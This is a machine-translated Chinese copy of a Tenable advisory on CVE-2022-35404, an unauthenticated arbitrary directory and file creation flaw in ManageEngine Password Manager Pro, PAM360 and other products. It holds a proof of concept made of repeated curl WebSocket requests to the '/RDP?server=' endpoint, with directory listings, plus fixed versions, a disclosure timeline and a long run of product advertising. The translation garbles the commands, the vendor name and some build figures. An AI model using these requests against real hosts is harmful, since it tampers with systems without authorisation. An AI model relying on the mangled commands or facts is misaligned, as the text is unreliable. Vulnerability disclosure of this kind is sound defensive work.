脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

ManageEngine远程目录/文件创建多个产品

媒介
←查看更多的研究报告

剧情简介

站得住脚的发现漏洞ManageEngine密码管理器支持(PMP)建立12007年,允许一个未经身份验证的远程攻击者创建任意目录和大量的小型文件在PMP主机上。

POC:

#服务器使用不同的参数来创建不同的目录curl - k - h ' Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = = ' - h的Sec-WebSocket-Version: 13 - h的升级:websocket https:// < pmp-host >: 7273 / RDP吗?服务器= c: \ \路径\ dir1 \ aaa&width = 1440身高= 788“curl - k - h”Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = =“- h”Sec-WebSocket-Version: 13 - h的升级:websocket“https:// < pmp >: 7273 / RDP吗?服务器= c: \ \路径\ dir2 \ aaa&width = 1440身高= 788“curl - k - h”Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = =“- h”Sec-WebSocket-Version: 13 - h的升级:websocket“https:// < pmp-host >: 7273 / RDP吗?服务器= c: \ \路径\ dir3 \ aaa&width = 1440身高= 788 ' C:\Users\管理员> dir / S / B c: \ \路径c: \ \路径\ dir1 c: \ \路径\ dir2 c: \ \路径\ dir3 c: \ \路径\ dir1 \ aaa。rdpv c: \ \路径\ dir2 \ aaa。rdpv c: \ \路径\ dir3 \ aaa。rdpv #使用重复运行创建多个独立的rdpv文件在同一个目录下旋度- k - h ' Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = = ' - h的Sec-WebSocket-Version: 13 - h的升级:websocket https:// < pmp-host >: 7273 / RDP吗?服务器= c: \ \ dir \ aaa&width = 1440身高= 788“curl - k - h”Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = =“- h”Sec-WebSocket-Version: 13 - h的升级:websocket“https:// < pmp-host >: 7273 / RDP吗?服务器= c: \ \ dir \ aaa&width = 1440身高= 788“curl - k - h”Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ = =“- h”Sec-WebSocket-Version: 13 - h的升级:websocket“https:// < pmp-host >: 7273 / RDP吗?服务器= c: \ \ dir \ aaa&width = 1440身高= 788”C:\Users\管理员> dir c: \ \ dir \卷驱动器c没有标签。卷序列号a453 - 987 d的目录c: \一些\ dir 05/10/2022 09:53点< dir >。05/10/2022 09:53点< DIR > . .05/10/2022 09:53点64 aaa.rdpv 05/10/2022 09:53 aaa_1点64。64 aaa_2.rdpv rdpv 05/10/2022 09:53点

注意,这个漏洞也适用于ManageEngine PAM360 (https端口8283),可能其他ManageEngine产品。

解决方案

应用适当的补丁/供应商的建议。

固定版本产品已知的影响包括:

  • ManageEngine密码管理器Pro版本12.1 12101
  • ManageEngine PAM360版本5.5 5510
  • ManageEngine Access Manager +版本4.3 4303
  • ManageEngine OpManager版本12.6 126101
  • ManageEngine OpManager版本12.5 125639

额外的引用

https://www.manageengine.com/products/passwordmanagerpro/advisory/cve - 2022 - 35404. - html
https://www.manageengine.com/itom/advisory/cve - 2022 - 35404. - html
https://www.manageengine.com/products/passwordmanagerpro/release-notes.html
https://www.manageengine.com/privileged-access-management/release-notes.html
https://www.manageengine.com/privileged-session-management/release-notes.html
https://www.manageengine.com/network-monitoring/help/read-me-complete.html # 126101
https://www.manageengine.com/network-monitoring/help/read-me.html

披露时间表

2022年5月11日—漏洞被发现
2022年5月20日——脆弱性报告给供应商
2022年5月21日—供应商确认收到报告吗
2022年6月15日—站得住脚的要求供应商更新
2022年6月16日—供应商证实了他们的团队正在研究这个问题,并指出其他一些产品也受到影响,正在工作
2022年6月16日—站得住脚的问其他产品都受到影响
2022年6月20日—供应商规定的几个ITOM产品也影响和他们的团队工作
2022年6月23 - 24日,供应商解决漏洞补丁发布几个产品
2022年7月1日,供应商通知站得住脚的,补丁发布
2022年7月6日——站得住脚的请求CVE和供应商咨询信息
2022年7月6日——供应商回答说,CVE分配请求,将发表一次

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
25 - 2022
CVSSv3基地/时间的分数
5.3/4.9
CVSSv3向量
CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: N /我:L /答:N / E: F / RL: O / RC: C
受影响的产品
ManageEngine密码管理器支持<版本12.1 12101
ManageEngine PAM360 <版本5.5 5510
ManageEngine Access Manager + <版本4.3 4303
ManageEngine OpManager 12.6 <建造126101
ManageEngine OpManager 12.5 <建造125639
ManageEngine网络配置管理器12.6 <建造126101
ManageEngine网络配置管理器12.5 <建造125639
ManageEngine NetFlow Analyzer 12.6 <建造126101
ManageEngine NetFlow Analyzer 12.5 <建造125639
ManageEngine防火墙Analyzer 12.6 <建造126101
ManageEngine防火墙Analyzer 12.5 <建造125639
风险因素
媒介

咨询时间

2022年7月6日——最初版本
2022年7月7日——添加引用链接
2022年7月13日—CVE补充道
2022年7月26日,添加供应商咨询链接和其他受影响的产品
免费试 现在购买

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买
免费试 现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

现在购买
更新现有的许可证|找一个经销商|请求报价
免费试 现在购买
Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买
免费试 现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

免费试 联系销售

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

免费试 联系销售

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

免费试 现在购买

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

现在购买
更新现有的许可证|找一个经销商|请求报价
免费试 现在购买

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

现在购买
更新现有的许可证|找一个经销商|请求报价
Baidu
map